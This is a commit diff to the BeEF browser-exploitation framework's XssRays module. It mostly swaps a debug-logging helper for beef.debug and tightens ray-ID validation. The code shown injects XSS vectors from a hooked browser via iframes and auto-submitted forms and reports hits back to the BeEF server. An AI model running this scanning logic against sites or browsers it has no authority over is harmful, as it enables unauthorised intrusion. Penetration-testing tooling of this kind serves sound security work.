Use beef.debug for XSSrays debugging
This commit is contained in:
Brendan Coles
@@ -41,9 +41,8 @@ beef.net.xssrays = {
|
||||
xssraysScanId : 0,
|
||||
hookedBrowserSession: "",
|
||||
beefRayUrl: "",
|
||||
// the 3 following variables are overridden via BeEF, in the Scan Config XssRays sub-tab.
|
||||
// the following variables are overridden via BeEF, in the Scan Config XssRays sub-tab.
|
||||
crossDomain: false,
|
||||
debug:false,
|
||||
cleanUpTimeout:5000,
|
||||
|
||||
//browser-specific attack vectors available strings: ALL, FF, IE, S, C, O
|
||||
@@ -98,35 +97,27 @@ beef.net.xssrays = {
|
||||
break;
|
||||
default : result = false;
|
||||
}
|
||||
beef.net.xssrays.printDebug("==== browser_id ==== [" + browser_id + "], result [" + result + "]");
|
||||
beef.debug("==== browser_id ==== [" + browser_id + "], result [" + result + "]");
|
||||
return result;
|
||||
},
|
||||
|
||||
// util function. Print string to the console only if the debug flag is on and the browser is not IE.
|
||||
printDebug:function(log) {
|
||||
if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) {
|
||||
beef.debug("[XssRays] " + log);
|
||||
}
|
||||
},
|
||||
|
||||
// main function, where all starts :-)
|
||||
startScan:function(xssraysScanId, hookedBrowserSession, beefUrl, crossDomain, timeout, debug) {
|
||||
startScan:function(xssraysScanId, hookedBrowserSession, beefUrl, crossDomain, timeout) {
|
||||
|
||||
this.xssraysScanId = xssraysScanId;
|
||||
this.hookedBrowserSession = hookedBrowserSession;
|
||||
this.beefRayUrl = beefUrl + '/' + this.handler;
|
||||
beef.net.xssrays.printDebug("Using [" + this.beefRayUrl + "] handler to contact back BeEF");
|
||||
beef.debug("Using [" + this.beefRayUrl + "] handler to contact back BeEF");
|
||||
this.crossDomain = crossDomain;
|
||||
this.cleanUpTimeout = timeout;
|
||||
this.debug = debug;
|
||||
|
||||
this.scan();
|
||||
beef.net.xssrays.printDebug("Starting scan");
|
||||
beef.debug("Starting scan");
|
||||
this.runJobs();
|
||||
},
|
||||
complete:function() {
|
||||
if (beef.net.xssrays.completed == beef.net.xssrays.totalConnections) {
|
||||
beef.net.xssrays.printDebug("COMPLETE, notifying BeEF for scan id [" + beef.net.xssrays.xssraysScanId + "]");
|
||||
beef.debug("COMPLETE, notifying BeEF for scan id [" + beef.net.xssrays.xssraysScanId + "]");
|
||||
$j.get(this.beefRayUrl, { hbsess: this.hookedBrowserSession, raysid: this.xssraysScanId, action: "finish"} );
|
||||
} else {
|
||||
this.getNextJob();
|
||||
@@ -134,7 +125,7 @@ beef.net.xssrays = {
|
||||
},
|
||||
getNextJob:function() {
|
||||
var that = this;
|
||||
beef.net.xssrays.printDebug("getNextJob - this.stack.length [" + this.stack.length + "]");
|
||||
beef.debug("getNextJob - this.stack.length [" + this.stack.length + "]");
|
||||
if (this.stack.length > 0) {
|
||||
var func = that.stack.shift();
|
||||
if (func) {
|
||||
@@ -158,21 +149,19 @@ beef.net.xssrays = {
|
||||
return this;
|
||||
},
|
||||
scanLinks: function() { //TODO: add depth crawling for links that are in the same domain
|
||||
beef.net.xssrays.printDebug("scanLinks, document.links.length [" + document.links.length + "]");
|
||||
beef.debug("scanLinks, document.links.length [" + document.links.length + "]");
|
||||
for (var i = 0; i < document.links.length; i++) {
|
||||
var url = document.links[i];
|
||||
|
||||
if ((url.hostname.toString() === location.hostname.toString() || this.crossDomain) && (location.protocol === 'http:' || location.protocol === 'https:')) {
|
||||
beef.net.xssrays.printDebug("Starting scanning URL [" + url + "]\n url.href => " + url.href +
|
||||
beef.debug("Starting scanning URL [" + url + "]\n url.href => " + url.href +
|
||||
"\n url.pathname => " + url.pathname + "\n" +
|
||||
"url.search => " + url.search + "\n");
|
||||
this.xss({href:url.href, pathname:url.pathname, hostname:url.hostname, port: url.port, protocol: location.protocol,
|
||||
search:url.search, type: 'url'});//scan each link & param
|
||||
} else {
|
||||
if (this.debug) {
|
||||
beef.net.xssrays.printDebug('Scan is not Cross-domain. URLS\nurl :' + url.hostname.toString());
|
||||
beef.net.xssrays.printDebug('\nlocation :' + location.hostname.toString());
|
||||
}
|
||||
beef.debug('Scan is not Cross-domain. URLS\nurl :' + url.hostname.toString());
|
||||
beef.debug('\nlocation :' + location.hostname.toString());
|
||||
}
|
||||
}
|
||||
if (location.search.length > 0) {
|
||||
@@ -201,7 +190,7 @@ beef.net.xssrays = {
|
||||
for (var i = 0; i < this.vectors.length; i++) {
|
||||
// skip the current vector if it's not compatible with the hooked browser
|
||||
if (!this.checkBrowser(i)){
|
||||
beef.net.xssrays.printDebug("Skipping vector [" + this.vectors[i].name + "] because it's not compatible with the current browser.");
|
||||
beef.debug("Skipping vector [" + this.vectors[i].name + "] because it's not compatible with the current browser.");
|
||||
continue;
|
||||
}
|
||||
if (!this.vectors[i].url) {
|
||||
@@ -209,19 +198,19 @@ beef.net.xssrays = {
|
||||
}
|
||||
if (this.vectors[i].url) {
|
||||
if (target.port == null || target.port == "") {
|
||||
beef.net.xssrays.printDebug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + pathname + "]");
|
||||
beef.debug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + pathname + "]");
|
||||
this.run(target.protocol + '//' + target.hostname + pathname, 'GET', this.vectors[i], params, true);//params
|
||||
} else {
|
||||
beef.net.xssrays.printDebug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + pathname + "]");
|
||||
beef.debug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + pathname + "]");
|
||||
this.run(target.protocol + '//' + target.hostname + ':' + target.port + pathname, 'GET', this.vectors[i], params, true);//params
|
||||
}
|
||||
}
|
||||
if (this.vectors[i].path) {
|
||||
if (target.port == null || target.port == "") {
|
||||
beef.net.xssrays.printDebug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + pathname + "]");
|
||||
beef.debug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + pathname + "]");
|
||||
this.run(target.protocol + '//' + target.hostname + pathname, 'GET', this.vectors[i], null, true);//paths
|
||||
} else {
|
||||
beef.net.xssrays.printDebug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + pathname + "]");
|
||||
beef.debug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + pathname + "]");
|
||||
this.run(target.protocol + '//' + target.hostname + ':' + target.port + pathname, 'GET', this.vectors[i], null, true);//paths
|
||||
}
|
||||
}
|
||||
@@ -244,31 +233,29 @@ beef.net.xssrays = {
|
||||
|
||||
// skip the current vector if it's not compatible with the hooked browser
|
||||
if (!this.checkBrowser(k)){
|
||||
beef.net.xssrays.printDebug("Skipping vector [" + this.vectors[i].name + "] because it's not compatible with the current browser.");
|
||||
beef.debug("Skipping vector [" + this.vectors[i].name + "] because it's not compatible with the current browser.");
|
||||
continue;
|
||||
}
|
||||
if (!this.vectors[k].form) {
|
||||
continue;
|
||||
}
|
||||
if (!this.crossDomain && (this.host(action).toString() != this.host(location.toString()))) {
|
||||
if (this.debug) {
|
||||
beef.net.xssrays.printDebug('Scan is not Cross-domain. FormPost\naction :' + this.host(action).toString());
|
||||
beef.net.xssrays.printDebug('location :' + this.host(location));
|
||||
}
|
||||
beef.debug('Scan is not Cross-domain. FormPost\naction :' + this.host(action).toString());
|
||||
beef.debug('location :' + this.host(location));
|
||||
continue;
|
||||
}
|
||||
if (this.vectors[k].form) {
|
||||
if (method === 'GET') {
|
||||
beef.net.xssrays.printDebug("Starting XSS on FORM action params, GET method of [" + action + "], params [" + paramsstring + "]");
|
||||
beef.debug("Starting XSS on FORM action params, GET method of [" + action + "], params [" + paramsstring + "]");
|
||||
this.run(action, method, this.vectors[k], params, true);//params
|
||||
}
|
||||
else {
|
||||
beef.net.xssrays.printDebug("Starting XSS on FORM action params, POST method of [" + action + "], params [" + paramsstring + "]");
|
||||
beef.debug("Starting XSS on FORM action params, POST method of [" + action + "], params [" + paramsstring + "]");
|
||||
this.run(action, method, this.vectors[k], params, false);//params
|
||||
}
|
||||
}
|
||||
if (this.vectors[k].path) {
|
||||
beef.net.xssrays.printDebug("Starting XSS on FORM action URI PATH of [" + action + "], ");
|
||||
beef.debug("Starting XSS on FORM action URI PATH of [" + action + "], ");
|
||||
this.run(action, 'GET', this.vectors[k], null, true);//paths
|
||||
}
|
||||
}
|
||||
@@ -305,11 +292,11 @@ beef.net.xssrays = {
|
||||
// this check is needed only when checking for URI path injections
|
||||
if(url[url.length - 1] == "/" && params == null){
|
||||
url = url.substring(0, url.length - 2);
|
||||
beef.net.xssrays.printDebug("Remove last / from url. New url [" + url + "]");
|
||||
beef.debug("Remove last / from url. New url [" + url + "]");
|
||||
}
|
||||
|
||||
beef.net.xssrays.uniqueID++;
|
||||
beef.net.xssrays.printDebug('Processing vector [' + vector.name + "], URL [" + url + "]");
|
||||
beef.debug('Processing vector [' + vector.name + "], URL [" + url + "]");
|
||||
var poc = '';
|
||||
var pocurl = url;
|
||||
var exploit = '';
|
||||
@@ -400,7 +387,7 @@ beef.net.xssrays = {
|
||||
iframe.src = url;
|
||||
}
|
||||
document.body.appendChild(iframe);
|
||||
beef.net.xssrays.printDebug("Creating XSS iFrame with src [" + iframe.src + "], id[" + iframe.id + "], time [" + iframe.time + "]");
|
||||
beef.debug("Creating XSS iFrame with src [" + iframe.src + "], id[" + iframe.id + "], time [" + iframe.time + "]");
|
||||
} else if (method === 'POST') {
|
||||
/*
|
||||
* ++++++++++ check for XSS in body parameters (POST) ++++++++++
|
||||
@@ -410,7 +397,7 @@ beef.net.xssrays = {
|
||||
pocurl = action + "?";
|
||||
paramsPos = 0;
|
||||
|
||||
beef.net.xssrays.printDebug("Form action [" + action + "]");
|
||||
beef.debug("Form action [" + action + "]");
|
||||
for (var i in params) {
|
||||
if (params.hasOwnProperty(i)) {
|
||||
|
||||
@@ -426,17 +413,17 @@ beef.net.xssrays = {
|
||||
|
||||
exploit = beef.net.xssrays.escape(vector.input.replace(/XSS/g, beefCallback));
|
||||
form += '<textarea name="' + i + '">' + exploit + '<\/textarea>';
|
||||
beef.net.xssrays.printDebug("form param[" + i + "] = " + params[i].toString());
|
||||
beef.debug("form param[" + i + "] = " + params[i].toString());
|
||||
|
||||
paramsPos++;
|
||||
}
|
||||
}
|
||||
form += '<\/form>';
|
||||
document.body.appendChild(iframe);
|
||||
beef.net.xssrays.printDebug("Creating form [" + form + "]");
|
||||
beef.debug("Creating form [" + form + "]");
|
||||
iframe.contentWindow.document.writeln(form);
|
||||
iframe.contentWindow.document.writeln('<script>document.createElement("form").submit.apply(document.forms[0]);<\/script>');
|
||||
beef.net.xssrays.printDebug("Submitting form");
|
||||
beef.debug("Submitting form");
|
||||
}
|
||||
|
||||
});
|
||||
@@ -452,15 +439,17 @@ beef.net.xssrays = {
|
||||
for (var i = 0; i < document.getElementsByTagName('iframe').length; i++) {
|
||||
var iframe = document.getElementsByTagName('iframe')[i];
|
||||
numOfConnections++;
|
||||
//beef.net.xssrays.printDebug("runJobs parseInt(this.timestamp()) [" + parseInt(beef.net.xssrays.timestamp()) + "], parseInt(iframe.time) [" + parseInt(iframe.time) + "]");
|
||||
//beef.debug("runJobs parseInt(this.timestamp()) [" + parseInt(beef.net.xssrays.timestamp()) + "], parseInt(iframe.time) [" + parseInt(iframe.time) + "]");
|
||||
if (parseInt(beef.net.xssrays.timestamp()) - parseInt(iframe.time) > 5) {
|
||||
try{
|
||||
if (iframe) {
|
||||
beef.net.xssrays.complete();
|
||||
beef.net.xssrays.printDebug("RunJobs cleaning up iFrame [" + iframe.id + "]");
|
||||
beef.debug("RunJobs cleaning up iFrame [" + iframe.id + "]");
|
||||
document.body.removeChild(iframe);
|
||||
}
|
||||
}catch(e){beef.net.xssrays.printDebug("Exception [" + e.toString() + "] when cleaning iframes.")}
|
||||
}catch(e){
|
||||
beef.debug("Exception [" + e.toString() + "] when cleaning iframes.")
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
@@ -35,7 +35,6 @@ module BeEF
|
||||
beefurl = BeEF::Core::Server.instance.url
|
||||
cross_domain = xs.cross_domain
|
||||
timeout = xs.clean_timeout
|
||||
debug = config.get("beef.extension.xssrays.js_console_logs")
|
||||
|
||||
ws = BeEF::Core::Websocket::Websocket.instance
|
||||
|
||||
@@ -51,7 +50,7 @@ module BeEF
|
||||
// Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
// See the file \'doc/COPYING\' for copying permission
|
||||
//', "")
|
||||
add_to_body xs.id, hb.session, beefurl, cross_domain, timeout, debug
|
||||
add_to_body xs.id, hb.session, beefurl, cross_domain, timeout
|
||||
|
||||
if config.get("beef.extension.evasion.enable")
|
||||
evasion = BeEF::Extension::Evasion::Evasion.instance
|
||||
@@ -62,19 +61,19 @@ module BeEF
|
||||
# If we use XHR-polling, add the component to the main hook file
|
||||
else
|
||||
build_missing_beefjs_components 'beef.net.xssrays'
|
||||
add_to_body xs.id, hb.session, beefurl, cross_domain, timeout, debug
|
||||
add_to_body xs.id, hb.session, beefurl, cross_domain, timeout
|
||||
end
|
||||
|
||||
print_debug("[XSSRAYS] Adding XssRays to the DOM. Scan id [#{xs.id}], started at [#{xs.scan_start}], cross domain [#{cross_domain}], clean timeout [#{timeout}], js console debug [#{debug}].")
|
||||
print_debug("[XSSRAYS] Adding XssRays to the DOM. Scan id [#{xs.id}], started at [#{xs.scan_start}], cross domain [#{cross_domain}], clean timeout [#{timeout}].")
|
||||
|
||||
end
|
||||
|
||||
def add_to_body(id, session, beefurl, cross_domain, timeout, debug)
|
||||
def add_to_body(id, session, beefurl, cross_domain, timeout)
|
||||
config = BeEF::Core::Configuration.instance
|
||||
|
||||
req = %Q{
|
||||
beef.execute(function() {
|
||||
beef.net.xssrays.startScan('#{id}', '#{session}', '#{beefurl}', #{cross_domain}, #{timeout}, #{debug});
|
||||
beef.net.xssrays.startScan('#{id}', '#{session}', '#{beefurl}', #{cross_domain}, #{timeout});
|
||||
});
|
||||
}
|
||||
|
||||
|
||||
@@ -11,5 +11,3 @@ beef:
|
||||
authors: ["antisnatchor"]
|
||||
clean_timeout: 3000
|
||||
cross_domain: true
|
||||
# set js_console_logs to false when using BeEF in production (also because IE < 9 doesn't support the console object)
|
||||
js_console_logs: true
|
||||
|
||||
@@ -17,22 +17,30 @@ module BeEF
|
||||
# verify if the request contains the hook token
|
||||
# raise an error if it's null or not found in the DB
|
||||
beef_hook = params[:hbsess] || nil
|
||||
(print_error "[XSSRAYS] Invalid beefhook id: the hooked browser cannot be found in the database";return) if beef_hook.nil? || HB.first(:session => beef_hook) == nil
|
||||
|
||||
if beef_hook.nil? || HB.first(:session => beef_hook).nil?
|
||||
print_error "[XSSRAYS] Invalid beef hook ID: the hooked browser cannot be found in the database"
|
||||
return
|
||||
end
|
||||
|
||||
# verify the specified ray ID is valid
|
||||
rays_scan_id = params[:raysid] || nil
|
||||
(print_error "[XSSRAYS] Raysid is null";return) if rays_scan_id.nil?
|
||||
if rays_scan_id.nil? || !BeEF::Filters::nums_only?(rays_scan_id)
|
||||
print_error "[XSSRAYS] Invalid ray ID"
|
||||
return
|
||||
end
|
||||
|
||||
if params[:action] == 'ray'
|
||||
case params[:action]
|
||||
when 'ray'
|
||||
# we received a ray
|
||||
parse_rays(rays_scan_id)
|
||||
when 'finish'
|
||||
# we received a notification for finishing the scan
|
||||
finalize_scan(rays_scan_id)
|
||||
else
|
||||
if params[:action] == 'finish'
|
||||
# we received a notification for finishing the scan
|
||||
finalize_scan(rays_scan_id)
|
||||
else
|
||||
#invalid action
|
||||
print_error "[XSSRAYS] Invalid action";return
|
||||
end
|
||||
# invalid action
|
||||
print_error "[XSSRAYS] Invalid action"
|
||||
return
|
||||
end
|
||||
|
||||
headers 'Pragma' => 'no-cache',
|
||||
@@ -58,7 +66,7 @@ module BeEF
|
||||
)
|
||||
xssrays_detail.save
|
||||
end
|
||||
print_info("[XSSRAYS] Scan id [#{xssrays_scan.id}] received ray [ip:#{hooked_browser.ip.to_s}], hooked domain [#{hooked_browser.domain.to_s}]")
|
||||
print_info("[XSSRAYS] Scan id [#{xssrays_scan.id}] received ray [ip:#{hooked_browser.ip}], hooked domain [#{hooked_browser.domain}]")
|
||||
print_debug("[XSSRAYS] Ray info: \n #{request.query_string}")
|
||||
end
|
||||
|
||||
|
||||
Reference in New Issue
Block a user